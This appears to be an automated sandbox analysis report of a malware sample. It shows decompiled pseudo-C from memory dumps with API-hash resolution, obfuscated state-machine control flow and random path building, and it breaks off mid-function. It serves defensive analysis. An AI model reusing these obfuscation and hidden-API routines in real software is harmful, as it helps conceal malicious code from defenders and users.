UI, xrefs: 02905BCC
dD, xrefs: 02905AEE

Memory Dump Source

Source File: 00000000.00000002.249411331.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID:
String ID: UI$dD
API String ID: 0-2678678791
Opcode ID: 5b0b6e09fcfe7a652f9b1521d2d76371d588ae290acbf1882c862c8981155b4e
Instruction ID: 07e5c331fa95d48abada21edf3db6417459a0e2101e63e68929aa618529d1edd
Opcode Fuzzy Hash: 5b0b6e09fcfe7a652f9b1521d2d76371d588ae290acbf1882c862c8981155b4e
Instruction Fuzzy Hash: 004102B65083878BD354CF28D54651BBBF4FB90724F450E1DE4A1962A0D3B8DA4DCB93

Uniqueness

Uniqueness Score: -1.00%

Function 029C3D10, Relevance: 2.6, Strings: 2, Instructions: 71
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E029C3D10(signed short* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _t58;
				signed int _t60;
				signed short* _t65;
				signed int _t68;
				signed int _t72;

				_v4 = 0x9c4e;
				_t65 = __ecx;
				_v4 = _v4 + 0x4464;
				_v4 = _v4 >> 1;
				_v4 = _v4 + 0xffff87db;
				_v4 = _v4 + 0xffff18d7;
				_v4 = _v4 + 0xffff529c;
				_v4 = _v4 + 0xffff507b;
				_v4 = _v4 | 0x3b9f69dc;
				_v4 = _v4 ^ 0xfffffdfe;
				_v8 = 0x31f8;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x67893507;
				_v8 = _v8 ^ 0x679fe359;
				_v8 = 0x4955;
				_v8 = _v8 ^ 0xa8908194;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xffffdf1d;
				_v8 = _v8 + 0xfffff42f;
				_v8 = _v8 | 0x02e6e862;
				_v8 = _v8 + 0xa6c2;
				_v8 = _v8 ^ 0xe36c9a70;
				_v8 = _v8 ^ 0xe1830958;
				if( *((short*)(__ecx)) != 0) {
					do {
						_t60 = _v4;
						_v8 = 0x31f8;
						_v8 = _v8 * 0x75;
						_v8 = _v8 ^ 0x67893507;
						_v8 = _v8 ^ 0x679fe359;
						_v8 = 0x4955;
						_v8 = _v8 ^ 0xa8908194;
						_v8 = _v8 >> 8;
						_v8 = _v8 + 0xffffdf1d;
						_v8 = _v8 + 0xfffff42f;
						_v8 = _v8 | 0x02e6e862;
						_v8 = _v8 + 0xa6c2;
						_v8 = _v8 ^ 0xe36c9a70;
						_v8 = _v8 ^ 0xe1830958;
						_t72 = _v4 << (_v8 & 0x000000ff);
						_t58 =  *_t65 & 0x0000ffff;
						_t68 = _v4 << (_v8 & 0x000000ff);
						if(_t58 >= 0x41 && _t58 <= 0x5a) {
							_t58 = _t58 + 0x20;
						}
						_v4 = _t58;
						_t65 =  &(_t65[1]);
						_v4 = _v4 + _t72;
						_v4 = _v4 + _t68;
						_v4 = _v4 - _t60;
					} while ( *_t65 != 0);
				}
				return _v4;
			}

0x029c3d13
0x029c3d1b
0x029c3d1d
0x029c3d25
0x029c3d29
0x029c3d31
0x029c3d39
0x029c3d41
0x029c3d49
0x029c3d51
0x029c3d59
0x029c3d64
0x029c3d67
0x029c3d6e
0x029c3d75
0x029c3d7c
0x029c3d83
0x029c3d87
0x029c3d8e
0x029c3d95
0x029c3d9c
0x029c3da3
0x029c3daa
0x029c3db5
0x029c3dc0
0x029c3dc0
0x029c3dc4
0x029c3dd1
0x029c3dd5
0x029c3ddd
0x029c3dee
0x029c3df6
0x029c3dfe
0x029c3e03
0x029c3e0b
0x029c3e13
0x029c3e1b
0x029c3e23
0x029c3e2b
0x029c3e33
0x029c3e3e
0x029c3e41
0x029c3e46
0x029c3e4d
0x029c3e4d
0x029c3e50
0x029c3e54
0x029c3e57
0x029c3e5b
0x029c3e5f
0x029c3e63
0x029c3e6f
0x029c3e77

Strings

dD, xrefs: 029C3D1D
UI, xrefs: 029C3DEE

Memory Dump Source

Source File: 00000000.00000002.249838612.00000000029C1000.00000020.00000001.sdmp, Offset: 029C0000, based on PE: true

Associated: 00000000.00000002.249823573.00000000029C0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249848856.00000000029CD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249854417.00000000029D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29c0000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID:
String ID: UI$dD
API String ID: 0-2678678791
Opcode ID: 82085eb77aa1e6d6502ea5e6256e2cd79fe0ef0b357a1ba66029e8c86d29f621
Instruction ID: 0b080ff9551ad6193a0c6c522872e0e8a8a03512aced2e4fd524ef8c3dff45ae
Opcode Fuzzy Hash: 82085eb77aa1e6d6502ea5e6256e2cd79fe0ef0b357a1ba66029e8c86d29f621
Instruction Fuzzy Hash: 5431C1B2508342AFD3849E2AC54611FFBF0BB91724F46CD5DE0E9861A0D3B88989CF47

Uniqueness

Uniqueness Score: -1.00%

Function 029058AE, Relevance: 2.6, Strings: 2, Instructions: 71COMMON

Download Yara Rule

Strings

dD, xrefs: 029058BB
UI, xrefs: 0290598C

Memory Dump Source

Source File: 00000000.00000002.249411331.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID:
String ID: UI$dD
API String ID: 0-2678678791
Opcode ID: 82085eb77aa1e6d6502ea5e6256e2cd79fe0ef0b357a1ba66029e8c86d29f621
Instruction ID: faf28eead034f5aa18714bfe7b8733f97dd76446fde38589678a7c28142afcc2
Opcode Fuzzy Hash: 82085eb77aa1e6d6502ea5e6256e2cd79fe0ef0b357a1ba66029e8c86d29f621
Instruction Fuzzy Hash: 3C31CFB2508342AFD3849E2AC54611FFBF4BB90724F46CD1DE0E9861A0D3B88989CF43

Uniqueness

Uniqueness Score: -1.00%

Function 029C3BA0, Relevance: 2.6, Strings: 2, Instructions: 66
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E029C3BA0(char* __ecx) {
				signed int _v4;
				signed int _v8;
				char* _t83;

				_v4 = 0x9c4e;
				_v4 = _v4 + 0x4464;
				_v4 = _v4 >> 1;
				_v4 = _v4 + 0xffff87db;
				_v4 = _v4 + 0xffff18d7;
				_v4 = _v4 + 0xffff529c;
				_v4 = _v4 + 0xffff507b;
				_v4 = _v4 | 0x3b9f69dc;
				_v4 = _v4 ^ 0xfffffdfe;
				_v8 = 0x31f8;
				_t83 = __ecx;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x67893507;
				_v8 = _v8 ^ 0x679fe359;
				_v8 = 0x4955;
				_v8 = _v8 ^ 0xa8908194;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xffffdf1d;
				_v8 = _v8 + 0xfffff42f;
				_v8 = _v8 | 0x02e6e862;
				_v8 = _v8 + 0xa6c2;
				_v8 = _v8 ^ 0xe36c9a70;
				_v8 = _v8 ^ 0xe1830958;
				if( *__ecx != 0) {
					do {
						_t83 = _t83 + 1;
						_v8 = 0x31f8;
						_v8 = _v8 * 0x75;
						_v8 = _v8 ^ 0x67893507;
						_v8 = _v8 ^ 0x679fe359;
						_v8 = 0x4955;
						_v8 = _v8 ^ 0xa8908194;
						_v8 = _v8 >> 8;
						_v8 = _v8 + 0xffffdf1d;
						_v8 = _v8 + 0xfffff42f;
						_v8 = _v8 | 0x02e6e862;
						_v8 = _v8 + 0xa6c2;
						_v8 = _v8 ^ 0xe36c9a70;
						_v8 = _v8 ^ 0xe1830958;
						_v4 =  *((char*)(_t83 - 1));
						_v4 = _v4 + (_v4 << (_v8 & 0x000000ff));
						_v4 = _v4 + (_v4 << (_v8 & 0x000000ff));
						_v4 = _v4 - _v4;
					} while ( *_t83 != 0);
				}
				return _v4;
			}

0x029c3ba3
0x029c3bab
0x029c3bb3
0x029c3bb7
0x029c3bbf
0x029c3bc7
0x029c3bcf
0x029c3bd7
0x029c3bdf
0x029c3be7
0x029c3bf3
0x029c3bf5
0x029c3bf9
0x029c3c01
0x029c3c09
0x029c3c11
0x029c3c19
0x029c3c1e
0x029c3c26
0x029c3c2e
0x029c3c36
0x029c3c3e
0x029c3c46
0x029c3c51
0x029c3c60
0x029c3c64
0x029c3c67
0x029c3c74
0x029c3c78
0x029c3c80
0x029c3c91
0x029c3c99
0x029c3ca1
0x029c3ca6
0x029c3cae
0x029c3cb6
0x029c3cbe
0x029c3cc6
0x029c3cce
0x029c3ce5
0x029c3ce9
0x029c3cef
0x029c3cf3
0x029c3cf7
0x029c3d01
0x029c3d0a

Strings

UI, xrefs: 029C3C91
UI, xrefs: 029C3C09

Memory Dump Source

Source File: 00000000.00000002.249838612.00000000029C1000.00000020.00000001.sdmp, Offset: 029C0000, based on PE: true

Associated: 00000000.00000002.249823573.00000000029C0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249848856.00000000029CD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249854417.00000000029D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29c0000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID:
String ID: UI$UI
API String ID: 0-658841096
Opcode ID: 8fb8486042db03a29a3c642504b4275772910a8ab76727c30505b2b065e064e3
Instruction ID: 6bea647cdadaa266f722a0ecdd0e280d3d6566e057ae85723739a28276d71631
Opcode Fuzzy Hash: 8fb8486042db03a29a3c642504b4275772910a8ab76727c30505b2b065e064e3
Instruction Fuzzy Hash: 3931E0B5509341AFD394CE29C64A60FBBF0BB84B24F44CD5DE4E9821A4D3788909DF43

Uniqueness

Uniqueness Score: -1.00%

Function 0290573E, Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

UI, xrefs: 0290582F
UI, xrefs: 029057A7

Memory Dump Source

Source File: 00000000.00000002.249411331.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID:
String ID: UI$UI
API String ID: 0-658841096
Opcode ID: 8fb8486042db03a29a3c642504b4275772910a8ab76727c30505b2b065e064e3
Instruction ID: e24de2a5d4972cd04290d981d0fad08d3367cb6efb023c397e7b14fd91bba89a
Opcode Fuzzy Hash: 8fb8486042db03a29a3c642504b4275772910a8ab76727c30505b2b065e064e3
Instruction Fuzzy Hash: 9931CFB5509341AFD394CE29C64A60FBBF0BB84B24F44CD5DE4E9821A4D3788909DF43

Uniqueness

Uniqueness Score: -1.00%

Function 02909DDE, Relevance: 1.4, Strings: 1, Instructions: 183COMMON

Download Yara Rule

Strings

J, xrefs: 02909E77

Memory Dump Source

Source File: 00000000.00000002.249411331.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID:
String ID: J
API String ID: 0-2715717022
Opcode ID: 9b2aa766b6f360a6032440e5340912928a874ebab550b6d52b42b550c637d21c
Instruction ID: 578118b0b2a461f4a22ebb0d62b5e20d645249bb7150fbb18dd6c91a38b96237
Opcode Fuzzy Hash: 9b2aa766b6f360a6032440e5340912928a874ebab550b6d52b42b550c637d21c
Instruction Fuzzy Hash: 0761AB71A083059FD718DF68C9C4A2EB7EABBC4704F04892DF596AB290D774D909CF82

Uniqueness

Uniqueness Score: -1.00%

Function 029C1C70, Relevance: 1.4, Strings: 1, Instructions: 106
COMMONCrypto

Download Yara Rule

C-Code - Quality: 66%

			E029C1C70(void* __ecx) {
				char _v4;
				signed int _v8;
				signed int _v12;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t57;
				signed int _t58;
				intOrPtr* _t64;
				signed int _t65;
				intOrPtr* _t67;
				int _t73;
				void* _t78;
				signed int _t80;
				signed int _t91;
				void* _t110;
				void* _t114;
				void* _t115;
				signed int _t117;
				signed int* _t118;

				_t118 =  &_v12;
				_v8 = 0xac2a;
				_v8 = _v8 ^ 0xfb427452;
				_v8 = _v8 | 0x0433d0b5;
				_v8 = _v8 ^ 0xff73d8f5;
				_v12 = 0xb90d;
				_v12 = _v12 + 0xffffc883;
				_v12 = _v12 + 0xffff4556;
				_v12 = _v12 + 0xffff66fa;
				_v12 = _v12 + 0xffff302a;
				_v12 = _v12 + 0xffffad71;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0xe0b7b010;
				_t57 =  *0x29cdd4c;
				_t114 = __ecx;
				if(_t57 == 0) {
					_t57 = E029C3E80(_t78, E029C3F20(0xbb398380), 0xae3c1a47, _t115);
					 *0x29cdd4c = _t57;
				}
				_t58 =  *_t57();
				_v12 = 0x788;
				_v12 = _v12 >> 0xc;
				_t117 = _v8 + _t58 % _v12;
				_v12 = _v12 + 0xffff671b;
				_v12 = _v12 ^ 0x6acd08c3;
				_v12 = _v12 * 0x32;
				_v12 = _v12 + 0xffff2d32;
				_v12 = _v12 ^ 0x491450b8;
				_v12 = (_v12 - (0x29e4129f * _v12 >> 0x20) >> 1) + (0x29e4129f * _v12 >> 0x20) >> 6;
				_v12 = _v12 ^ 0x00f88eb6;
				_v8 = 0x2ce8;
				_v8 = _v8 + 0xffffe7d1;
				_v8 = _v8 * 0x4b;
				_v8 = _v8 + 0x84e;
				_v8 = _v8 ^ 0x00061a91;
				_t64 =  *0x29cdd4c;
				if(_t64 == 0) {
					_t64 = E029C3E80(_t78, E029C3F20(0xbb398380), 0xae3c1a47, _t117);
					 *0x29cdd4c = _t64;
				}
				_t65 =  *_t64();
				_t67 =  *0x29cdd4c;
				_t80 = _v12 + _t65 % _v8;
				if(_t67 == 0) {
					_t67 = E029C3E80(_t80, E029C3F20(0xbb398380), 0xae3c1a47, _t117);
					 *0x29cdd4c = _t67;
				}
				_v4 =  *_t67();
				if(_t117 != 0) {
					_t110 = _t114;
					_t91 = _t117 >> 1;
					_t114 = _t114 + _t117 * 2;
					_t73 = memset(_t110, 0x2d002d, _t91 << 2);
					asm("adc ecx, ecx");
					memset(_t110 + _t91, _t73, 0);
					_t118 =  &(_t118[6]);
				}
				E029C4ED0(_t114, _t80,  &_v4);
				 *((short*)(_t114 + _t80 * 2)) = 0;
				return 0;
			}

0x029c1c70
0x029c1c73
0x029c1c7b
0x029c1c83
0x029c1c8b
0x029c1c93
0x029c1c9a
0x029c1ca1
0x029c1ca8
0x029c1caf
0x029c1cb6
0x029c1cbd
0x029c1cc1
0x029c1cc8
0x029c1cd0
0x029c1cd4
0x029c1ce7
0x029c1cec
0x029c1cec
0x029c1cf1
0x029c1cff
0x029c1d07
0x029c1d0c
0x029c1d0e
0x029c1d16
0x029c1d23
0x029c1d2c
0x029c1d34
0x029c1d4b
0x029c1d4f
0x029c1d57
0x029c1d5f
0x029c1d6c
0x029c1d70
0x029c1d78
0x029c1d80
0x029c1d87
0x029c1d9a
0x029c1d9f
0x029c1d9f
0x029c1da4
0x029c1db2
0x029c1db7
0x029c1dbb
0x029c1dce
0x029c1dd3
0x029c1dd3
0x029c1dda
0x029c1de0
0x029c1de5
0x029c1de7
0x029c1de9
0x029c1df1
0x029c1df3
0x029c1df5
0x029c1df5
0x029c1df8
0x029c1e02
0x029c1e0c
0x029c1e16

Strings

,, xrefs: 029C1D57

Memory Dump Source

Source File: 00000000.00000002.249838612.00000000029C1000.00000020.00000001.sdmp, Offset: 029C0000, based on PE: true

Associated: 00000000.00000002.249823573.00000000029C0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249848856.00000000029CD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249854417.00000000029D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29c0000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-48859977
Opcode ID: 299aa0d7604917cce07f0b9d9432e8c89d48d105ed87905ed972afaca26009a7
Instruction ID: dfdcb1f8b15a109db241b25de17a89c0a7e19eb09e5a83162358646da6b36b5a
Opcode Fuzzy Hash: 299aa0d7604917cce07f0b9d9432e8c89d48d105ed87905ed972afaca26009a7
Instruction Fuzzy Hash: E94167B5A083029BC748EF69E81416AB7E6AFC4314F10CD2DE4D68B650EB7899058F97

Uniqueness

Uniqueness Score: -1.00%

Function 0290380E, Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

,, xrefs: 029038F5

Memory Dump Source

Source File: 00000000.00000002.249411331.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-48859977
Opcode ID: f7fa7f053b15b3b9bc5260059ed6039f3f15b89ed0c9b9de4249ee0e0695fea7
Instruction ID: 4695ff36ceb296810fb1d24ccff7c02d783af35610a29679f44aa62f0ca61413
Opcode Fuzzy Hash: f7fa7f053b15b3b9bc5260059ed6039f3f15b89ed0c9b9de4249ee0e0695fea7
Instruction Fuzzy Hash: 8D418E75A093059FC758EFA9D89412AB7E6BFC0314F01C92DE4D6873A0EB7499098F46

Uniqueness

Uniqueness Score: -1.00%

Function 0290095E, Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249411331.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4003efdb1b82660489297cf81d9eb3b1a92828f19abc9c79053ce197bdd8e6b4
Instruction ID: 21f1fd4a16cb91e1ae052b09646e5d81121d3a917bdfed32da87be788b112fe3
Opcode Fuzzy Hash: 4003efdb1b82660489297cf81d9eb3b1a92828f19abc9c79053ce197bdd8e6b4
Instruction Fuzzy Hash: E7F1C8B4A01209EFDB04CF94C9D4BAEB7B5BF88304F108559E906AB395D775EE41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02900456, Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249411331.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
Instruction ID: 417a75107ffc32c02a910253fc337a4e29e4440912952a6e06818fd89a5c5661
Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
Instruction Fuzzy Hash: 9F319136A0474A8FC710DF18C4C0A2AB7E5FF89318F0609ADE99987352E734E946CB95

Uniqueness

Uniqueness Score: -1.00%

Function 02917069, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249411331.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45ce42b103561755d4b0d5b3549e83b35dba3c766e10e4d16ae96341d8646d43
Instruction ID: 272c483a7692f757c00d3ae2c54457eeb1919838a04ff592500eb484d57b2dd4
Opcode Fuzzy Hash: 45ce42b103561755d4b0d5b3549e83b35dba3c766e10e4d16ae96341d8646d43
Instruction Fuzzy Hash: AE1108356493D68FD709EE71A5222C7BFA1FA8BB04735A1DFC0114F222D6228447CB90

Uniqueness

Uniqueness Score: -1.00%

Function 029C4E20, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E029C4E20() {

				return  *[fs:0x30];
			}

0x029c4e26

Memory Dump Source

Source File: 00000000.00000002.249838612.00000000029C1000.00000020.00000001.sdmp, Offset: 029C0000, based on PE: true

Associated: 00000000.00000002.249823573.00000000029C0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249848856.00000000029CD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249854417.00000000029D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29c0000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 029069BE, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249411331.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 029414A0, Relevance: 12.2, APIs: 8, Instructions: 171COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 029414DB
SetLastError.KERNEL32(0000007F), ref: 02941507

Memory Dump Source

Source File: 00000000.00000002.249702328.0000000002941000.00000020.00000001.sdmp, Offset: 02941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2941000_0TOEtGJHN8.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 99387046d3b0fba9fc541893fcbd15fd587d45d3341a85a1f5ec2562cbbaf71d
Instruction ID: 32f30cb08a7919afc4a0bc62a9b272c1efc29a021732188ae663945a755e1139
Opcode Fuzzy Hash: 99387046d3b0fba9fc541893fcbd15fd587d45d3341a85a1f5ec2562cbbaf71d
Instruction Fuzzy Hash: 7B71B474E04109EFDB08DF98C580FADB7B2BF48304F648599E51AAB351DB34AA81DB94

Uniqueness

Uniqueness Score: -1.00%

Function 029C12B0, Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 396
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E029C12B0(char __ecx, signed int __edx, intOrPtr* _a4) {
				char _v2048;
				char _v2560;
				char _v2688;
				char _v2816;
				intOrPtr* _v2820;
				intOrPtr* _v2824;
				char _v2828;
				char _v2836;
				char _v2844;
				signed int _v2848;
				intOrPtr _v2852;
				void* _v2856;
				intOrPtr* _v2860;
				char _v2864;
				intOrPtr _v2868;
				char _v2872;
				intOrPtr* _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				char _v2892;
				intOrPtr* _v2896;
				intOrPtr _v2904;
				intOrPtr* _v2908;
				void* __ebx;
				void* __ebp;
				void* _t117;
				signed int _t118;
				void* _t121;
				intOrPtr* _t139;
				intOrPtr* _t141;
				signed int _t146;
				signed int _t154;
				intOrPtr* _t157;
				intOrPtr* _t159;
				signed int _t163;
				intOrPtr* _t174;
				signed int _t175;
				signed int _t178;
				intOrPtr* _t182;
				void* _t189;
				intOrPtr* _t191;
				intOrPtr* _t194;
				intOrPtr* _t196;
				char _t241;
				signed char* _t243;
				signed int _t263;
				short* _t265;
				void* _t266;
				short* _t267;
				void* _t268;
				void* _t269;
				intOrPtr _t270;
				signed int _t273;
				intOrPtr* _t274;
				void* _t276;
				void* _t277;
				intOrPtr* _t278;
				void* _t280;
				void* _t282;
				void* _t283;
				void* _t284;

				_t280 =  &_v2896;
				_t278 = _v2864;
				_t263 = __edx;
				_v2888 = 0;
				_t241 = __ecx;
				_v2884 = __edx;
				_t196 = _v2860;
				_t117 = 0xa52ba2c;
				_v2892 = __ecx;
				_v2896 = _t196;
				_v2876 = _t278;
				while(1) {
					L1:
					_t191 = _a4;
					goto L2;
					do {
						while(1) {
							L2:
							_t282 = _t117 - 0x1a712fee;
							if(_t282 > 0) {
								break;
							}
							if(_t282 == 0) {
								_t157 =  *0x29cdea8;
								__eflags = _t157;
								if(_t157 == 0) {
									_t157 = E029C3E80(_t191, E029C3F20(0xbb398380), 0x97f883e, _t278);
									 *0x29cdea8 = _t157;
								}
								_t268 =  *_t157();
								_t159 =  *0x29ce1a0;
								__eflags = _t159;
								if(_t159 == 0) {
									_t159 = E029C3E80(_t191, E029C3F20(0xbb398380), 0x26c3f343, _t278);
									 *0x29ce1a0 = _t159;
								}
								 *_t159(_t268, 0, _v2844);
								_t196 = _v2908;
								_t117 = 0xa9569d6;
								_t241 = _v2904;
								continue;
							} else {
								_t283 = _t117 - 0xa52ba2c;
								if(_t283 > 0) {
									__eflags = _t117 - 0x1194a5ec;
									if(__eflags > 0) {
										__eflags = _t117 - 0x1947423a;
										if(_t117 != 0x1947423a) {
											goto L28;
										} else {
											_t163 = E029C1FB0( &_v2872,  &_v2856);
											_t196 = _v2896;
											_t241 = _v2892;
											asm("sbb eax, eax");
											_t117 = ( ~_t163 & 0xd3a4a493) + 0x2ec7d52f;
											continue;
										}
									} else {
										if(__eflags == 0) {
											_t265 =  &_v2560;
											_t194 = _v2880 - (0xaaaaaaab * _v2880 >> 0x20 >> 2) + (0xaaaaaaab * _v2880 >> 0x20 >> 2) * 2 + (0xaaaaaaab * _v2880 >> 0x20 >> 2) + (0xaaaaaaab * _v2880 >> 0x20 >> 2) * 2 + 1;
											__eflags = _t194;
											if(_t194 != 0) {
												do {
													_t273 = (_v2880 & 0x0000000f) + 4;
													E029C4ED0(_t265, _t273,  &_v2880);
													_t267 = _t265 + _t273 * 2;
													_t280 = _t280 + 4;
													 *_t267 = 0x2f;
													_t265 = _t267 + 2;
													_t194 = _t194 - 1;
													__eflags = _t194;
												} while (_t194 != 0);
												_t278 = _v2876;
												_t196 = _v2896;
											}
											_t241 = _v2892;
											 *_t265 = 0;
											_t117 = 0x26613761;
											_t263 = _v2884;
											goto L1;
										} else {
											__eflags = _t117 - 0xa9569d6;
											if(_t117 == 0xa9569d6) {
												E029C4250(_t191, _v2864);
												_t196 = _v2896;
												_t117 = 0xc5127ed;
												_t241 = _v2892;
												continue;
											} else {
												__eflags = _t117 - 0xc5127ed;
												if(_t117 == 0xc5127ed) {
													L69:
													E029C4250(_t191, _t278);
													L70:
													return _v2888;
												} else {
													goto L28;
												}
											}
										}
									}
								} else {
									if(_t283 == 0) {
										_t174 =  *0x29cdd4c;
										__eflags = _t174;
										if(_t174 == 0) {
											_t174 = E029C3E80(_t191, E029C3F20(0xbb398380), 0xae3c1a47, _t278);
											 *0x29cdd4c = _t174;
										}
										_t175 =  *_t174();
										_t196 = _v2896;
										_t241 = _v2892;
										_v2880 = _t175;
										_t117 = 0x38f41d46;
										continue;
									} else {
										_t284 = _t117 - 0x3354cb2;
										if(_t284 > 0) {
											__eflags = _t117 - 0x8f8b881;
											if(_t117 != 0x8f8b881) {
												goto L28;
											} else {
												_t178 = E029C1950( &_v2844,  &_v2688,  &_v2836);
												_t196 = _v2896;
												_t280 = _t280 + 4;
												_t241 = _v2892;
												asm("sbb eax, eax");
												_t117 = ( ~_t178 & 0x0c54f09a) + 0x1a712fee;
												continue;
											}
										} else {
											if(_t284 == 0) {
												_t269 = E029C34C0(0x29cd0e0);
												_t182 =  *0x29cdc60;
												__eflags = _t182;
												if(_t182 == 0) {
													_t182 = E029C3E80(_t191, E029C3F20(0xe66945e6), 0xcca28b0d, _t278);
													 *0x29cdc60 = _t182;
												}
												 *_t182( &_v2048, 0x400, _t269,  &_v2816,  &_v2688);
												_t280 = _t280 + 0x14;
												E029C3460(_t269);
												_t196 = _v2896;
												_t117 = 0x8f8b881;
												_t241 = _v2892;
												continue;
											} else {
												if(_t117 == 0xe50069) {
													E029C4250(_t191, _v2856);
													_t196 = _v2896;
													_t117 = 0x2ec7d52f;
													_t241 = _v2892;
													continue;
												} else {
													if(_t117 != 0x26c79c2) {
														goto L28;
													} else {
														 *((intOrPtr*)(_t191 + 4)) =  *_v2856;
														_t270 = E029C42F0(_t191,  *_v2856);
														 *_t191 = _t270;
														if(_t270 != 0) {
															_push( *((intOrPtr*)(_t191 + 4)));
															_push(_t270);
															_t189 = E029C57E0(_v2852 - 4);
															_t280 = _t280 + 8;
															asm("sbb edi, edi");
															_v2888 =  ~_t263;
															if(0 == _t189) {
																E029C4250(_t191,  *_t191);
															}
															_t263 = _v2884;
														}
														_t196 = _v2896;
														_t117 = 0xe50069;
														_t241 = _v2892;
														continue;
													}
												}
											}
										}
									}
								}
							}
							L71:
						}
						__eflags = _t117 - 0x2ec7d52f;
						if(__eflags > 0) {
							__eflags = _t117 - 0x310afd51;
							if(_t117 == 0x310afd51) {
								_v2828 = _t241;
								_v2820 = _t196;
								_v2824 = _t278;
								_t118 = E029C1E60( &_v2828,  &_v2864);
								_t196 = _v2896;
								_t241 = _v2892;
								asm("sbb eax, eax");
								_t117 = ( ~_t118 & 0x1deeb958) + 0xc5127ed;
								goto L2;
							} else {
								__eflags = _t117 - 0x3380dca7;
								if(_t117 == 0x3380dca7) {
									_t121 = E029C34C0(0x29cd080);
